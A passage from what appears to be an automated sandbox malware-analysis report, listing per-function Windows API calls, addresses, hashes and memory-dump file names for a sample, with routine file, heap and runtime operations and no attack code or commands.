                                                              • Opcode ID: 6c27ef6c634331b6a7805196e76a6588a803047b3ae2039d2610a25c2fbcc9e9
                                                              • Instruction ID: de9331568bcff3a61742c0922afa6c87c6825e49f1f3794be7eb6e7e602ad9c8
                                                              • Opcode Fuzzy Hash: 6c27ef6c634331b6a7805196e76a6588a803047b3ae2039d2610a25c2fbcc9e9
                                                              • Instruction Fuzzy Hash: D7F09A31645208BFDB1A6F54CC06CAEBF61FF45B21B004164F918EA360DA365A10DB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 565e4d8db53c5c0a26deae7de201e9928db8a8d7d2ecb5615ce30d17266ea8c9
                                                              • Instruction ID: 868073b7057d63e5bd573b7183ae70c8104030aa169b0e6f8d057c16a58b2a0d
                                                              • Opcode Fuzzy Hash: 565e4d8db53c5c0a26deae7de201e9928db8a8d7d2ecb5615ce30d17266ea8c9
                                                              • Instruction Fuzzy Hash: 2AE05530680308BBE625AB28CC029AEBF54FB85721B0102A8F800E3740CE785E0082CA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089EAF9
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3So
                                                              • API String ID: 1269201914-1105799393
                                                              • Opcode ID: ba5444fd6e3e97622330e0bb8c426330aa2a365c936899567fe329ca2150f3b9
                                                              • Instruction ID: f84b2ee6dfd366e4bb5544eac0bb560373ca2412defc0c5b636cd7abbb32a1a3
                                                              • Opcode Fuzzy Hash: ba5444fd6e3e97622330e0bb8c426330aa2a365c936899567fe329ca2150f3b9
                                                              • Instruction Fuzzy Hash: 88B012C62AA4967D3904F2861D06C37070CF1F2BA0334843EF510D4191EC800C090432
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008AB7BB: GetOEMCP.KERNEL32(00000000,?,?,008ABA44,?), ref: 008AB7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008ABA89,?,00000000), ref: 008ABC64
                                                              • GetCPInfo.KERNEL32(00000000,008ABA89,?,?,?,008ABA89,?,00000000), ref: 008ABC77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 7270e33f784ddda0dd4bd92240baf1b3806a53bb7068ba9d8e591605bbb35db6
                                                              • Instruction ID: f5a905dde5093113e6ec6783333da020eeca2bf530b2e526e4eedc30eb88c64b
                                                              • Opcode Fuzzy Hash: 7270e33f784ddda0dd4bd92240baf1b3806a53bb7068ba9d8e591605bbb35db6
                                                              • Instruction Fuzzy Hash: 37512370A002499FFB209F75C881ABABBE4FF43314F18406ED496CBA53DB3999458B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00889A50,?,?,00000000,?,?,00888CBC,?), ref: 00889BAB
                                                              • GetLastError.KERNEL32(?,00000000,00888411,-00009570,00000000,000007F3), ref: 00889BB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: c8fcbc37cab0f001144e193e846ff7ee9d4b6599d7ce9c6d5f099557389d683d
                                                              • Instruction ID: 799dacf2723fcb1e11c01015d494a070bb660b79e8127648151c440e203ac7de
                                                              • Opcode Fuzzy Hash: c8fcbc37cab0f001144e193e846ff7ee9d4b6599d7ce9c6d5f099557389d683d
                                                              • Instruction Fuzzy Hash: 3E4189316043658FDB24AF29E58487AB7E6FF94320F188A2DE8C1C3260E770AD458B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008A97E5: GetLastError.KERNEL32(?,008C1030,008A4674,008C1030,?,?,008A3F73,00000050,?,008C1030,00000200), ref: 008A97E9
                                                                • Part of subcall function 008A97E5: _free.LIBCMT ref: 008A981C
                                                                • Part of subcall function 008A97E5: SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A985D
                                                                • Part of subcall function 008A97E5: _abort.LIBCMT ref: 008A9863
                                                                • Part of subcall function 008ABB4E: _abort.LIBCMT ref: 008ABB80
                                                                • Part of subcall function 008ABB4E: _free.LIBCMT ref: 008ABBB4
                                                                • Part of subcall function 008AB7BB: GetOEMCP.KERNEL32(00000000,?,?,008ABA44,?), ref: 008AB7E6
                                                              • _free.LIBCMT ref: 008ABA9F
                                                              • _free.LIBCMT ref: 008ABAD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID:
                                                              • API String ID: 2991157371-0
                                                              • Opcode ID: c1fa5a2e478710739a5d9f6bad6134f02953e3efd4601f70dc3d70ff2d17cac9
                                                              • Instruction ID: 792134673ad819dbd596e47b5211065e384e0701d7b2064c8c622cb34279858a
                                                              • Opcode Fuzzy Hash: c1fa5a2e478710739a5d9f6bad6134f02953e3efd4601f70dc3d70ff2d17cac9
                                                              • Instruction Fuzzy Hash: 6C31B331904219AFFB10DFA8D441B9977F5FF42320F214199E504DB6A3EB72AD41DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00881E55
                                                                • Part of subcall function 00883BBA: __EH_prolog.LIBCMT ref: 00883BBF
                                                              • _wcslen.LIBCMT ref: 00881EFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: 67c476feb79eefc6ffde94d0b92ced8a6706813b27a083f3e14b306eff684f53
                                                              • Instruction ID: 522e3a0d2ed400f1dbb4d89520fa37962df6f54dca3a260a93cd85173f39206d
                                                              • Opcode Fuzzy Hash: 67c476feb79eefc6ffde94d0b92ced8a6706813b27a083f3e14b306eff684f53
                                                              • Instruction Fuzzy Hash: 42313671904209AECF11EF98C949AEEBBFAFF18310F1000AAF845E7251CB325E11CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008873BC,?,?,?,00000000), ref: 00889DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00889E70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: aa5baacc9ab22b75f16a682dea942a14e258175430bc3b5c52a3e80fd3f7422c
                                                              • Instruction ID: 140f6e357faee3c1a96e3083866257bcdaa15259238488885d45c81101edc2f2
                                                              • Opcode Fuzzy Hash: aa5baacc9ab22b75f16a682dea942a14e258175430bc3b5c52a3e80fd3f7422c
                                                              • Instruction Fuzzy Hash: 8021BD31248246EBCB14EA68C895ABABBE8FF95304F0C495CF4C5C7541D329E90D9B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00889F27,?,?,0088771A), ref: 008896E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00889F27,?,?,0088771A), ref: 00889716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: db9c0ceb48a1771db56a0b6b07a7c610263463d2b0b96caf67cc3ca7faf927ee
                                                              • Instruction ID: ce6bd1c0838b90ad1ea1f4e6c719d23c8647d200665847adf4c8f7cb3cc811d9
                                                              • Opcode Fuzzy Hash: db9c0ceb48a1771db56a0b6b07a7c610263463d2b0b96caf67cc3ca7faf927ee
                                                              • Instruction Fuzzy Hash: 9121C1711447446FE370AA69CC89BB777DCFB59324F180A19F9D5C21D1D774A8848731
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00889EC7
                                                              • GetLastError.KERNEL32 ref: 00889ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: c19968261ff47623d70e0d1fe3b9334079ef7385b31fc66c839146ff24c3e8f5
                                                              • Instruction ID: c24a1dd0ee222b321738bbf3824bb1dd6bd9e0431831b5173b5b428b471d9f18
                                                              • Opcode Fuzzy Hash: c19968261ff47623d70e0d1fe3b9334079ef7385b31fc66c839146ff24c3e8f5
                                                              • Instruction Fuzzy Hash: 5211E530600704ABD734E628C885BB6BBE9FF45370F544A69E592D26D0D7B0ED49C760
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008A8E75
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008C1098,008817CE,?,?,00000007,?,?,?,008813D6,?,00000000), ref: 008A8EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 2aece57d0d8ba0864c1848fa12fca0bf01150565a96c16c83a84dc23a7442f19
                                                              • Instruction ID: 804a14b939034d0c0276fe242f7fff0f116c127d3a3af78f23cdbda5a7d9223f
                                                              • Opcode Fuzzy Hash: 2aece57d0d8ba0864c1848fa12fca0bf01150565a96c16c83a84dc23a7442f19
                                                              • Instruction Fuzzy Hash: 64F0F632601115E6FB212A699C04B6F7B58FF93B70F640125F814EAD91DF70DD2091B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 008910AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 008910B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: 874a0dc582ed2c8409eff1ab7d54d025bb5ee566f620c28b5a67f409497af46a
                                                              • Instruction ID: 6e19b1d062f089252fbaf64cddf92562a34c7e37bd482a995652a473d4ef2d77
                                                              • Opcode Fuzzy Hash: 874a0dc582ed2c8409eff1ab7d54d025bb5ee566f620c28b5a67f409497af46a
                                                              • Instruction Fuzzy Hash: B8E0D832F0094AA7DF09A7B49C098EB73DDFA442043184175E403D3101F931DE424A60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008ABF30: GetEnvironmentStringsW.KERNEL32 ref: 008ABF39
                                                                • Part of subcall function 008ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008ABF5C
                                                                • Part of subcall function 008ABF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008ABF82
                                                                • Part of subcall function 008ABF30: _free.LIBCMT ref: 008ABF95
                                                                • Part of subcall function 008ABF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008ABFA4
                                                              • _free.LIBCMT ref: 008A82AE
                                                              • _free.LIBCMT ref: 008A82B5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID:
                                                              • API String ID: 400815659-0
                                                              • Opcode ID: 2642b78f341f11d3098c2c689fcc5a630fb3a2890eceef47484237bbc02befbc
                                                              • Instruction ID: 0722d33a9c342ce78cebb11309a25d263c39cd94991073df543b595258edd631
                                                              • Opcode Fuzzy Hash: 2642b78f341f11d3098c2c689fcc5a630fb3a2890eceef47484237bbc02befbc
                                                              • Instruction Fuzzy Hash: 00E06D63A06D92D5B661327E6C4277B1608FB83378F550226FB20DB8C3DE50880645B7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A501
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0088A325,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: a7d204b937b8fc9bb087fdcb7124bebc095ccf32d24807705259e786dbe940ee
                                                              • Instruction ID: f3012db2c55a278b433b42355fc8f5693e50e42c3ce5a8ae8e5b81771a157e09
                                                              • Opcode Fuzzy Hash: a7d204b937b8fc9bb087fdcb7124bebc095ccf32d24807705259e786dbe940ee
                                                              • Instruction Fuzzy Hash: FEF0A03124010ABBEF016F60DC41FDA376CFF04385F488051B844D5160DB31EAD5DB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641,000000FF), ref: 0088A1F1
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0088977F,?,?,008895CF,?,?,?,?,?,008B2641), ref: 0088A21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: 136c3c39d4aedfd541956a3f49dd5dcaf827fe4f9eb82d0387f24a5a5a9c6e37
                                                              • Instruction ID: e7064c559b8e5a3f805d41c10283807776a513d77457aa4de696e8a629ab139d
                                                              • Opcode Fuzzy Hash: 136c3c39d4aedfd541956a3f49dd5dcaf827fe4f9eb82d0387f24a5a5a9c6e37
                                                              • Instruction Fuzzy Hash: 2DE092311442096BEB11BF64DC45FDD775CFF08385F484061B944E2090EB61DE85DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,008B2641,000000FF), ref: 0089ACB0
                                                              • OleUninitialize.OLE32(?,?,?,?,008B2641,000000FF), ref: 0089ACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: 12317a4c07d4bb1289b8af8d9f35e0253441ba867ed808b908dfbcf8a8b3cd8e
                                                              • Instruction ID: 27d68f5229bfb9cdb386b07a03c13d200503a9a5b9a885fbae1d6f2c9e2fcf60
                                                              • Opcode Fuzzy Hash: 12317a4c07d4bb1289b8af8d9f35e0253441ba867ed808b908dfbcf8a8b3cd8e
                                                              • Instruction Fuzzy Hash: 2BE06D72644650EFCB01EB5CDC46B49FBA9FB89B20F04436AF416D37A0CB74AC00CA94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0088A23A,?,0088755C,?,?,?,?), ref: 0088A254
